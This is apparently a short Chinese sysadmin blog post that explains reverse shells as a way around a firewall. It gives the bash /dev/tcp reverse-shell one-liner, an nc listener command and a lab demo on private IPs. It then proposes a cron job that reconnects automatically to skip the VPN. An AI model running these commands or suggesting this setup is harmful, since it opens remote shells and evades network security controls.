一、前言
运维人员经常在服务维护过程中遇到一个问题就是,有防火墙从外面没法登录服务器,正常登录需要挂vpn,比较麻烦。那么有没有一种方法可以穿透防火墙呢,答案是有的,简单点就是使用linux下反弹shell来做。反向连接运维机器就行了。

二、linux系统下反弹shell原理
通常防火墙是不允许外网ip连接内网服务器,但是内网的服务器可以上网可以向外面获取信息。那么我们就可以使用内部服务主动连接在外网的维护主机就可以穿透防火墙了。
原理,是不是很简单,既然你不能连接我,那么我主动连接你吧。这就是穿透防火墙的根源。
三、怎么实现反弹shell呢?
linux反弹shell非常简单,使用下面命令就可以实现。
bash -i >& /dev/tcp/目标IP/端口 0>&1
下面在测试环境下测试
服务器主机192.168.3.163
运维主机:192.168.3.121
首先我们在运维主机上进行一个端口监听,这里使用nc工具实现
nc -lnvp 6666
执行后下图所示

在服务器主机192.168.3.163 执行反弹shell
bash -i >& /dev/tcp/192.168.3.121/6666 0>&1

我们在运维主机就可以看到反弹连接了,如下图

四、如何应用实际场景
有人就问了,你这不得先去服务器执行反弹shell命令吗?是的没错,我们可以利用计划任务在我们工作时间内自动反弹连接我们运维主机不就解决了每次登录都需要vpn设置了吗!
这样我们固定时间内提前监听端口,工作时间等自动连接后,就可以开始维护服务器,不需要设置繁琐的vpn了。
627



被折叠的 条评论
为什么被折叠?



